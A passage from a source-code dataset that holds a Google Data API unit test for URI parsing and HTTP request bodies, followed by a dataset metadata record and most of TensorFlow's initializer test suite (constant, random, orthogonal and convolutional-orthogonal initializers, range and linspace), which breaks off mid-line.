#!/usr/bin/env python # # Copyright (C) 2009 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This module is used for version 2 of the Google Data APIs. __author__ = 'j.s@google.com (Jeff Scudder)' import unittest import atom.http_core import StringIO class UriTest(unittest.TestCase): def test_parse_uri(self): uri = atom.http_core.parse_uri('http://www.google.com/test?q=foo&z=bar') self.assert_(uri.scheme == 'http') self.assert_(uri.host == 'www.google.com') self.assert_(uri.port is None) self.assert_(uri.path == '/test') self.assert_(uri.query == {'z':'bar', 'q':'foo'}) def test_modify_request_no_request(self): uri = atom.http_core.parse_uri('http://www.google.com/test?q=foo&z=bar') request = uri.modify_request() self.assert_(request.uri.scheme == 'http') self.assert_(request.uri.host == 'www.google.com') # If no port was provided, the HttpClient is responsible for determining # the default. self.assert_(request.uri.port is None) self.assert_(request.uri.path.startswith('/test')) self.assertEqual(request.uri.query, {'z': 'bar', 'q': 'foo'}) self.assert_(request.method is None) self.assert_(request.headers == {}) self.assert_(request._body_parts == []) def test_modify_request_http_with_set_port(self): request = atom.http_core.HttpRequest(uri=atom.http_core.Uri(port=8080), method='POST') request.add_body_part('hello', 'text/plain') uri = atom.http_core.parse_uri('//example.com/greet') self.assert_(uri.query == {}) self.assert_(uri._get_relative_path() == '/greet') self.assert_(uri.host == 'example.com') self.assert_(uri.port is None) uri.ModifyRequest(request) self.assert_(request.uri.host == 'example.com') # If no scheme was provided, the URI will not add one, but the HttpClient # should assume the request is HTTP. self.assert_(request.uri.scheme is None) self.assert_(request.uri.port == 8080) self.assert_(request.uri.path == '/greet') self.assert_(request.method == 'POST') self.assert_(request.headers['Content-Type'] == 'text/plain') def test_modify_request_use_default_ssl_port(self): request = atom.http_core.HttpRequest( uri=atom.http_core.Uri(scheme='https'), method='PUT') request.add_body_part('hello', 'text/plain') uri = atom.http_core.parse_uri('/greet') uri.modify_request(request) self.assert_(request.uri.host is None) self.assert_(request.uri.scheme == 'https') # If no port was provided, leave the port as None, it is up to the # HttpClient to set the correct default port. self.assert_(request.uri.port is None) self.assert_(request.uri.path == '/greet') self.assert_(request.method == 'PUT') self.assert_(request.headers['Content-Type'] == 'text/plain') self.assert_(len(request._body_parts) == 1) self.assert_(request._body_parts[0] == 'hello') def test_to_string(self): uri = atom.http_core.Uri(host='www.google.com', query={'q':'sippycode'}) uri_string = uri._to_string() self.assert_(uri_string == 'http://www.google.com/?q=sippycode') class HttpRequestTest(unittest.TestCase): def test_request_with_one_body_part(self): request = atom.http_core.HttpRequest() self.assert_(len(request._body_parts) == 0) self.assert_('Content-Length' not in request.headers) self.assert_(not 'Content-Type' in request.headers) self.assert_(not 'Content-Length' in request.headers) request.add_body_part('this is a test', 'text/plain') self.assert_(len(request._body_parts) == 1) self.assert_(request.headers['Content-Type'] == 'text/plain') self.assert_(request._body_parts[0] == 'this is a test') self.assert_(request.headers['Content-Length'] == str(len( 'this is a test'))) def test_add_file_without_size(self): virtual_file = StringIO.StringIO('this is a test') request = atom.http_core.HttpRequest() try: request.add_body_part(virtual_file, 'text/plain') self.fail('We should have gotten an UnknownSize error.') except atom.http_core.UnknownSize: pass request.add_body_part(virtual_file, 'text/plain', len('this is a test')) self.assert_(len(request._body_parts) == 1) self.assert_(request.headers['Content-Type'] == 'text/plain') self.assert_(request._body_parts[0].read() == 'this is a test') self.assert_(request.headers['Content-Length'] == str(len( 'this is a test'))) def test_copy(self): request = atom.http_core.HttpRequest( uri=atom.http_core.Uri(scheme='https', host='www.google.com'), method='POST', headers={'test':'1', 'ok':'yes'}) request.add_body_part('body1', 'text/plain') request.add_body_part('<html>body2</html>', 'text/html') copied = request._copy() self.assert_(request.uri.scheme == copied.uri.scheme) self.assert_(request.uri.host == copied.uri.host) self.assert_(request.method == copied.method) self.assert_(request.uri.path == copied.uri.path) self.assert_(request.headers == copied.headers) self.assert_(request._body_parts == copied._body_parts) copied.headers['test'] = '2' copied._body_parts[1] = '<html>body3</html>' self.assert_(request.headers != copied.headers) self.assert_(request._body_parts != copied._body_parts) def suite(): return unittest.TestSuite((unittest.makeSuite(UriTest,'test'), unittest.makeSuite(HttpRequestTest,'test'))) if __name__ == '__main__': unittest.main()
40.039216
77
0.68446
795aa67248f66e72f8f772845c4ca5b2b1b06d3d
42,643
py
Python
tensorflow/python/kernel_tests/init_ops_test.py
tianyapiaozi/tensorflow
fb3ce0467766a8e91f1da0ad7ada7c24fde7a73a
[ "Apache-2.0" ]
71
2017-05-25T16:02:15.000Z
2021-06-09T16:08:08.000Z
tensorflow/python/kernel_tests/init_ops_test.py
tianyapiaozi/tensorflow
fb3ce0467766a8e91f1da0ad7ada7c24fde7a73a
[ "Apache-2.0" ]
133
2017-04-26T16:49:49.000Z
2019-10-15T11:39:26.000Z
tensorflow/python/kernel_tests/init_ops_test.py
tianyapiaozi/tensorflow
fb3ce0467766a8e91f1da0ad7ada7c24fde7a73a
[ "Apache-2.0" ]
26
2017-04-12T16:25:44.000Z
2018-10-30T10:10:15.000Z
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for tensorflow.ops.ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import random_seed from tensorflow.python.layers import convolutional from tensorflow.python.ops import array_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import linalg_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import partitioned_variables from tensorflow.python.ops import random_ops from tensorflow.python.ops import variable_scope from tensorflow.python.ops import variables from tensorflow.python.platform import test # Returns true iff the two initializers produce the same tensor to # within a tiny tolerance. def identicaltest(tc, init1, init2, shape=None): """Tests if two initializations are identical to within tiny tolerances. Args: tc: An instance of TensorFlowTestCase. init1: An Initializer that generates a tensor of a given shape init2: An Initializer that generates a tensor of a given shape shape: Shape of the tensor to initialize or `None` to use a vector of length 100. Returns: True or False as determined by test. """ if shape is None: shape = [100] with tc.test_session(graph=ops.Graph()): t1 = init1(shape).eval() with tc.test_session(graph=ops.Graph()): t2 = init2(shape).eval() return np.allclose(t1, t2, rtol=1e-15, atol=1e-15) def duplicated_initializer(tc, init, graph_seed, shape=None): """Tests duplicated random initializer within the same graph. This test generates two random kernels from the same initializer to the same graph, and checks if the results are close enough. Even given the same global, seed, two different instances of random kernels should generate different results. Args: tc: An instance of TensorFlowTestCase. init: An Initializer that generates a tensor of a given shape graph_seed: A graph-level seed to use. shape: Shape of the tensor to initialize or `None` to use a vector of length 100. Returns: True or False as determined by test. """ if shape is None: shape = [100] with tc.test_session(graph=ops.Graph()): random_seed.set_random_seed(graph_seed) t1 = init(shape).eval() t2 = init(shape).eval() return np.allclose(t1, t2, rtol=1e-15, atol=1e-15) def _init_sampler(tc, init, num): """Returns a func to generate a random tensor of shape [num]. Args: tc: An instance of TensorFlowTestCase. init: An Initializer that generates a tensor of a given shape num: Size of 1D tensor to create. Returns: Function to generate a random tensor. """ def func(): with tc.test_session(use_gpu=True): return init([num]).eval() return func class ConstantInitializersTest(test.TestCase): def testZerosInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.zeros_initializer()) x.initializer.run() self.assertAllEqual(x.eval(), np.zeros(shape)) def testOnesInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.ones_initializer()) x.initializer.run() self.assertAllEqual(x.eval(), np.ones(shape)) def testConstantZeroInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.constant_initializer(0.0)) x.initializer.run() self.assertAllEqual(x.eval(), np.zeros(shape)) def testConstantOneInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.constant_initializer(1.0)) x.initializer.run() self.assertAllEqual(x.eval(), np.ones(shape)) def testConstantIntInitializer(self): with self.test_session(use_gpu=True): shape = [2, 3] x = variable_scope.get_variable( "x", shape=shape, dtype=dtypes.int32, initializer=init_ops.constant_initializer(7)) x.initializer.run() self.assertEqual(x.dtype.base_dtype, dtypes.int32) self.assertAllEqual(x.eval(), 7 * np.ones(shape, dtype=np.int32)) def testConstantTupleInitializer(self): with self.test_session(use_gpu=True): shape = [3] x = variable_scope.get_variable( "x", shape=shape, dtype=dtypes.int32, initializer=init_ops.constant_initializer((10, 20, 30))) x.initializer.run() self.assertEqual(x.dtype.base_dtype, dtypes.int32) self.assertAllEqual(x.eval(), [10, 20, 30]) def _testNDimConstantInitializer(self, name, value, shape, expected): with self.test_session(use_gpu=True): init = init_ops.constant_initializer(value, dtype=dtypes.int32) x = variable_scope.get_variable(name, shape=shape, initializer=init) x.initializer.run() actual = array_ops.reshape(x, [-1]).eval() self.assertEqual(len(actual), len(expected)) for a, e in zip(actual, expected): self.assertEqual(a, e) def testNDimConstantInitializer(self): value = [0, 1, 2, 3, 4, 5] shape = [2, 3] expected = list(value) self._testNDimConstantInitializer("list", value, shape, expected) self._testNDimConstantInitializer("ndarray", np.asarray(value), shape, expected) self._testNDimConstantInitializer("2D-ndarray", np.asarray(value).reshape(tuple(shape)), shape, expected) def _testNDimConstantInitializerLessValues(self, name, value, shape, expected): with self.test_session(use_gpu=True): init = init_ops.constant_initializer(value, dtype=dtypes.int32) x = variable_scope.get_variable(name, shape=shape, initializer=init) x.initializer.run() actual = array_ops.reshape(x, [-1]).eval() self.assertGreater(len(actual), len(expected)) for i in xrange(len(actual)): a = actual[i] e = expected[i] if i < len(expected) else expected[-1] self.assertEqual(a, e) def testNDimConstantInitializerLessValues(self): value = [0, 1, 2, 3, 4, 5] shape = [2, 4] expected = list(value) self._testNDimConstantInitializerLessValues("list", value, shape, expected) self._testNDimConstantInitializerLessValues("ndarray", np.asarray(value), shape, expected) self._testNDimConstantInitializerLessValues( "2D-ndarray", np.asarray(value).reshape(tuple([2, 3])), shape, expected) def _testNDimConstantInitializerMoreValues(self, value, shape): ops.reset_default_graph() with self.test_session(use_gpu=True): init = init_ops.constant_initializer(value, dtype=dtypes.int32) self.assertRaises( ValueError, variable_scope.get_variable, "x", shape=shape, initializer=init) def testNDimConstantInitializerMoreValues(self): value = [0, 1, 2, 3, 4, 5, 6, 7] shape = [2, 3] self._testNDimConstantInitializerMoreValues(value, shape) self._testNDimConstantInitializerMoreValues(np.asarray(value), shape) self._testNDimConstantInitializerMoreValues( np.asarray(value).reshape(tuple([2, 4])), shape) def testInvalidValueTypeForConstantInitializerCausesTypeError(self): c = constant_op.constant([1.0, 2.0, 3.0]) with self.assertRaisesRegexp( TypeError, r"Invalid type for initial value: .*Tensor.*"): init_ops.constant_initializer(c, dtype=dtypes.float32) v = variables.Variable([3.0, 2.0, 1.0]) with self.assertRaisesRegexp( TypeError, r"Invalid type for initial value: .*Variable.*"): init_ops.constant_initializer(v, dtype=dtypes.float32) class RandomNormalInitializationTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype) init2 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2)) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype) init2 = init_ops.random_normal_initializer(0.0, 1.0, seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2)) def testDuplicatedInitializer(self): init = init_ops.random_normal_initializer(0.0, 1.0) self.assertFalse(duplicated_initializer(self, init, 1)) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.random_normal_initializer, 0.0, 1.0, dtype=dtypes.string) class TruncatedNormalInitializationTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.truncated_normal_initializer( 0.0, 1.0, seed=1, dtype=dtype) init2 = init_ops.truncated_normal_initializer( 0.0, 1.0, seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2)) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.truncated_normal_initializer( 0.0, 1.0, seed=1, dtype=dtype) init2 = init_ops.truncated_normal_initializer( 0.0, 1.0, seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2)) def testDuplicatedInitializer(self): init = init_ops.truncated_normal_initializer(0.0, 1.0) self.assertFalse(duplicated_initializer(self, init, 1)) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.truncated_normal_initializer, 0.0, 1.0, dtype=dtypes.string) class RandomUniformInitializationTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64, dtypes.int64]: init1 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype) init2 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2)) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64, dtypes.int32, dtypes.int64]: init1 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype) init2 = init_ops.random_uniform_initializer(0, 7, seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2)) def testDuplicatedInitializer(self): init = init_ops.random_uniform_initializer(0.0, 1.0) self.assertFalse(duplicated_initializer(self, init, 1)) class UniformUnitScalingInitializationTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype) init2 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2)) init3 = init_ops.uniform_unit_scaling_initializer( 1.5, seed=1, dtype=dtype) init4 = init_ops.uniform_unit_scaling_initializer( 1.5, seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init3, init4)) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype) init2 = init_ops.uniform_unit_scaling_initializer(seed=2, dtype=dtype) init3 = init_ops.uniform_unit_scaling_initializer( 1.5, seed=1, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2)) self.assertFalse(identicaltest(self, init1, init3)) self.assertFalse(identicaltest(self, init2, init3)) def testZeroSize(self): shape = [0, 2] with self.test_session(): x = variable_scope.get_variable( "x", shape=shape, initializer=init_ops.uniform_unit_scaling_initializer()) variables.global_variables_initializer().run() self.assertAllEqual(shape, x.eval().shape) def testDuplicatedInitializer(self): init = init_ops.uniform_unit_scaling_initializer() self.assertFalse(duplicated_initializer(self, init, 1)) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.uniform_unit_scaling_initializer, dtype=dtypes.string) class VarianceScalingInitializationTest(test.TestCase): def testNormalDistribution(self): shape = [100, 100] expect_mean = 0. expect_var = 1. / shape[0] init = init_ops.variance_scaling_initializer(distribution='normal') with self.test_session(use_gpu=True): x = init(shape).eval() self.assertNear(np.mean(x), expect_mean, err=1e-2) self.assertNear(np.var(x), expect_var, err=1e-2) def testUniformDistribution(self): shape = [100, 100] expect_mean = 0. expect_var = 1. / shape[0] init = init_ops.variance_scaling_initializer(distribution='uniform') with self.test_session(use_gpu=True): x = init(shape).eval() self.assertNear(np.mean(x), expect_mean, err=1e-2) self.assertNear(np.var(x), expect_var, err=1e-2) # TODO(vrv): move to sequence_ops_test? class RangeTest(test.TestCase): def _Range(self, start, limit, delta): with self.test_session(use_gpu=True): tf_ans = math_ops.range(start, limit, delta, name="range") self.assertEqual([len(np.arange(start, limit, delta))], tf_ans.get_shape()) return tf_ans.eval() def testBasic(self): self.assertTrue( np.array_equal(self._Range(0, 5, 1), np.array([0, 1, 2, 3, 4]))) self.assertTrue(np.array_equal(self._Range(0, 5, 2), np.array([0, 2, 4]))) self.assertTrue(np.array_equal(self._Range(0, 6, 2), np.array([0, 2, 4]))) self.assertTrue( np.array_equal(self._Range(13, 32, 7), np.array([13, 20, 27]))) self.assertTrue( np.array_equal( self._Range(100, 500, 100), np.array([100, 200, 300, 400]))) self.assertEqual(math_ops.range(0, 5, 1).dtype, dtypes.int32) def testLimitOnly(self): with self.test_session(use_gpu=True): self.assertAllEqual(np.arange(5), math_ops.range(5).eval()) def testEmpty(self): for start in 0, 5: self.assertTrue(np.array_equal(self._Range(start, start, 1), [])) def testNonInteger(self): self.assertTrue( np.allclose(self._Range(0, 2, 0.5), np.array([0, 0.5, 1, 1.5]))) self.assertTrue(np.allclose(self._Range(0, 5, 2.5), np.array([0, 2.5]))) self.assertTrue( np.allclose(self._Range(0, 3, 0.9), np.array([0, 0.9, 1.8, 2.7]))) self.assertTrue( np.allclose( self._Range(100., 500., 100.), np.array([100, 200, 300, 400]))) self.assertEqual(math_ops.range(0., 5., 1.).dtype, dtypes.float32) def testNegativeDelta(self): self.assertTrue( np.array_equal(self._Range(5, -1, -1), np.array([5, 4, 3, 2, 1, 0]))) self.assertTrue( np.allclose(self._Range(2.5, 0, -0.5), np.array([2.5, 2, 1.5, 1, 0.5]))) self.assertTrue( np.array_equal(self._Range(-5, -10, -3), np.array([-5, -8]))) def testDType(self): zero_int32 = math_ops.cast(0, dtypes.int32) zero_int64 = math_ops.cast(0, dtypes.int64) zero_float32 = math_ops.cast(0, dtypes.float32) zero_float64 = math_ops.cast(0, dtypes.float64) self.assertEqual(math_ops.range(zero_int32, 0, 1).dtype, dtypes.int32) self.assertEqual(math_ops.range(zero_int64, 0, 1).dtype, dtypes.int64) self.assertEqual(math_ops.range(zero_float32, 0, 1).dtype, dtypes.float32) self.assertEqual(math_ops.range(zero_float64, 0, 1).dtype, dtypes.float64) self.assertEqual( math_ops.range(zero_int32, zero_int64, 1).dtype, dtypes.int64) self.assertEqual( math_ops.range(zero_int64, zero_float32, 1).dtype, dtypes.float32) self.assertEqual( math_ops.range(zero_float32, zero_float64, 1).dtype, dtypes.float64) self.assertEqual( math_ops.range(zero_float64, zero_int32, 1).dtype, dtypes.float64) self.assertEqual( math_ops.range( 0, 0, 1, dtype=dtypes.int32).dtype, dtypes.int32) self.assertEqual( math_ops.range( 0, 0, 1, dtype=dtypes.int64).dtype, dtypes.int64) self.assertEqual( math_ops.range( 0, 0, 1, dtype=dtypes.float32).dtype, dtypes.float32) self.assertEqual( math_ops.range( 0, 0, 1, dtype=dtypes.float64).dtype, dtypes.float64) # TODO(vrv): move to sequence_ops_test? class LinSpaceTest(test.TestCase): def _gpu_modes(self): if test.is_gpu_available(): return [False, True] else: return [False] def _LinSpace(self, start, stop, num): # NOTE(touts): Needs to pass a graph to get a new session each time. with ops.Graph().as_default() as graph: with self.test_session(graph=graph, force_gpu=self.force_gpu): tf_ans = math_ops.linspace(start, stop, num, name="linspace") self.assertEqual([num], tf_ans.get_shape()) return tf_ans.eval() def testPositive(self): for self.force_gpu in self._gpu_modes(): self.assertArrayNear(self._LinSpace(1., 5., 1), np.array([1.]), 1e-5) self.assertArrayNear(self._LinSpace(1., 5., 2), np.array([1., 5.]), 1e-5) self.assertArrayNear( self._LinSpace(1., 5., 3), np.array([1., 3., 5.]), 1e-5) self.assertArrayNear( self._LinSpace(1., 5., 4), np.array([1., 7. / 3., 11. / 3., 5.]), 1e-5) def testNegative(self): for self.force_gpu in self._gpu_modes(): self.assertArrayNear(self._LinSpace(-1., -5., 1), np.array([-1.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., -5., 2), np.array([-1., -5.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., -5., 3), np.array([-1., -3., -5.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., -5., 4), np.array([-1., -7. / 3., -11. / 3., -5.]), 1e-5) def testNegativeToPositive(self): for self.force_gpu in self._gpu_modes(): self.assertArrayNear(self._LinSpace(-1., 5., 1), np.array([-1.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., 5., 2), np.array([-1., 5.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., 5., 3), np.array([-1., 2., 5.]), 1e-5) self.assertArrayNear( self._LinSpace(-1., 5., 4), np.array([-1., 1., 3., 5.]), 1e-5) def testPoint(self): for self.force_gpu in self._gpu_modes(): self.assertArrayNear(self._LinSpace(5., 5., 1), np.array([5.]), 1e-5) self.assertArrayNear(self._LinSpace(5., 5., 2), np.array([5.] * 2), 1e-5) self.assertArrayNear(self._LinSpace(5., 5., 3), np.array([5.] * 3), 1e-5) self.assertArrayNear(self._LinSpace(5., 5., 4), np.array([5.] * 4), 1e-5) class DeviceTest(test.TestCase): def testNoDevice(self): with ops.Graph().as_default(): var = variables.Variable([[1.0, 1.0]]) self.assertDeviceEqual(None, var.device) self.assertDeviceEqual(None, var.initializer.device) def testDevice(self): with ops.Graph().as_default(): with ops.device("/job:ps"): var = variables.Variable([[1.0, 1.0]]) self.assertDeviceEqual("/job:ps", var.device) self.assertDeviceEqual("/job:ps", var.initializer.device) class OrthogonalInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype) init2 = init_ops.orthogonal_initializer(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype) init2 = init_ops.orthogonal_initializer(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (10, 10))) def testDuplicatedInitializer(self): init = init_ops.orthogonal_initializer() self.assertFalse(duplicated_initializer(self, init, 1, (10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.orthogonal_initializer, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.orthogonal_initializer() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[5]) def testGain(self): shape = (10, 10) for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype) init2 = init_ops.orthogonal_initializer(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testShapesValues(self): for dtype in [dtypes.float32, dtypes.float64]: for shape in [(10, 10), (10, 9, 8), (100, 5, 5), (50, 40), (40, 50)]: init = init_ops.orthogonal_initializer(dtype=dtype) tol = 1e-5 if dtype == dtypes.float32 else 1e-12 with self.test_session(graph=ops.Graph(), use_gpu=True): # Check the shape t = init(shape).eval() self.assertAllEqual(shape, t.shape) # Check orthogonality by computing the inner product t = t.reshape((np.prod(t.shape[:-1]), t.shape[-1])) if t.shape[0] > t.shape[1]: self.assertAllClose( np.dot(t.T, t), np.eye(t.shape[1]), rtol=tol, atol=tol) else: self.assertAllClose( np.dot(t, t.T), np.eye(t.shape[0]), rtol=tol, atol=tol) class ConvolutionDeltaOrthogonalInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_delta_orthogonal(seed=1, dtype=dtype) init2 = init_ops.convolutional_delta_orthogonal(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (3, 3, 10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_delta_orthogonal(seed=1, dtype=dtype) init2 = init_ops.convolutional_delta_orthogonal(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (3, 3, 10, 10))) def testDuplicatedInitializer(self): init = init_ops.convolutional_delta_orthogonal() self.assertFalse(duplicated_initializer(self, init, 1, (3, 3, 10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.convolutional_delta_orthogonal, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.convolutional_delta_orthogonal() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[3, 3, 6, 5]) def testGain(self): shape = (3, 3, 10, 10) for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_delta_orthogonal(seed=1, dtype=dtype) init2 = init_ops.convolutional_delta_orthogonal(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testShapesValues(self): gain = 3.14 for dtype in [dtypes.float32]: for kernel_size in [[3], [8], [3, 5], [2, 4], [3, 3, 3], [2, 2, 2]]: tol = 1e-2 # Check orthogonality by computing ratio between # the 2-norms of the inputs and outputs. if len(kernel_size) == 1: shape = [4, 32, 64] convolution = convolutional.conv1d elif len(kernel_size) == 2: convolution = convolutional.conv2d shape = [4, 32, 32, 64] else: shape = [4, 16, 16, 16, 64] convolution = convolutional.conv3d inputs = random_ops.random_normal(shape, dtype=dtype) inputs_2norm = linalg_ops.norm(inputs) outputs = convolution( inputs, padding="same", filters=128, kernel_size=kernel_size, use_bias=False, kernel_initializer=init_ops.convolutional_delta_orthogonal( gain=gain)) outputs_shape = shape[0:-1] + [128] outputs_2norm = linalg_ops.norm(outputs) ratio = outputs_2norm / inputs_2norm my_ops = variables.global_variables_initializer() with self.test_session(use_gpu=True) as sess: sess.run(my_ops) # Check the shape of the outputs t = outputs.eval() self.assertAllEqual(t.shape, outputs_shape) # Check isometry of the delta-orthogonal kernel. self.assertAllClose(sess.run(ratio), np.sqrt(gain), rtol=tol, atol=tol) def testNonuniformity(self): value = 0 abs_value = 0 shape = [3, 3, 10, 10] count = 70 tol = 1e-5 with self.test_session(use_gpu=True): for i in range(count): x = variable_scope.get_variable("{}".format(i), shape=shape, initializer= init_ops.convolutional_delta_orthogonal) x.initializer.run() y = x.eval()[1, 1, :, :] determinant = np.linalg.det(y) value += determinant abs_value += np.abs(determinant) # Check there is some variation in the signs of the determinants self.assertLess(value, count - tol) self.assertLess(-count + tol, value) # Check all determinants have absolute value 1 # Compute the sum of the absolute values of 'count' determinants self.assertAllClose(abs_value, count, rtol=tol, atol=tol) class ConvolutionOrthogonal1dInitializerTest(test.TestCase): def testInitializerIdentical(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_1d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_1d(seed=1, dtype=dtype) self.assertTrue(identicaltest(self, init1, init2, (3, 10, 10))) def testInitializerDifferent(self): for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_1d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_1d(seed=2, dtype=dtype) self.assertFalse(identicaltest(self, init1, init2, (3, 10, 10))) def testDuplicatedInitializer(self): init = init_ops.convolutional_orthogonal_1d() self.assertFalse(duplicated_initializer(self, init, 1, (3, 10, 10))) def testInvalidDataType(self): self.assertRaises( ValueError, init_ops.convolutional_orthogonal_1d, dtype=dtypes.string) def testInvalidShape(self): init1 = init_ops.convolutional_orthogonal_1d() with self.test_session(graph=ops.Graph(), use_gpu=True): self.assertRaises(ValueError, init1, shape=[3, 6, 5]) def testGain(self): shape = (3, 10, 10) for dtype in [dtypes.float32, dtypes.float64]: init1 = init_ops.convolutional_orthogonal_1d(seed=1, dtype=dtype) init2 = init_ops.convolutional_orthogonal_1d(gain=3.14, seed=1, dtype=dtype) with self.test_session(graph=ops.Graph(), use_gpu=True): t1 = init1(shape).eval() t2 = init2(shape).eval() return np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15) def testNonuniformity(self): value = 0 abs_value = 0 shape = [3, 10, 10] count = 70 tol = 1e-5 with self.test_session(use_gpu=True): for i in range(count): x = variable_scope.get_variable("{}".format(i), shape=shape, initializer= init_ops.convolutional_orthogonal_1d) x.initializer.run() y = np.sum(x.eval(), axis=0) determinant = np.linalg.det(y) value += determinant abs_value += np.abs(determinant) # Check there is some variation in the signs of the determinants. self.assertLess(value, count - tol) self.assertLess(-count + tol, value) # Check all determinants have absolute value 1 # Compute the sum of the absolute values of 'count' determinants self.assertAllClose(abs_value, count, rtol=tol, atol=tol) def testShapesValues(self): def circular_pad(input_, width, kernel_size): """Pad input_ for computing (circular) convolution. Args: input_: the input tensor width: the width of the tensor. kernel_size: the kernel size of the filter. Returns: a tensor whose width is (width + kernel_size - 1). """ beginning = kernel_size // 2 end = kernel_size - 1 - beginning tmp_up = array_ops.slice(input_, [0, width - beginning, 0], [-1, beginning, -1]) tmp_down = array_ops.slice(input_, [0, 0, 0], [-1, end, -1]) tmp = array_ops.concat([tmp_up, input_, tmp_down], 1) return tmp cout = 64 shape = [10, 20, 32] outputs_shape = shape[0:-1] + [cout] dtype = dtypes.float32 tol = 1e-3 gain = 3.14 # Check orthogonality/isometry by computing the ratio between # the 2-norms of the inputs and ouputs. for kernel_size in [[1], [2], [3], [4], [5], [6]]: convolution = 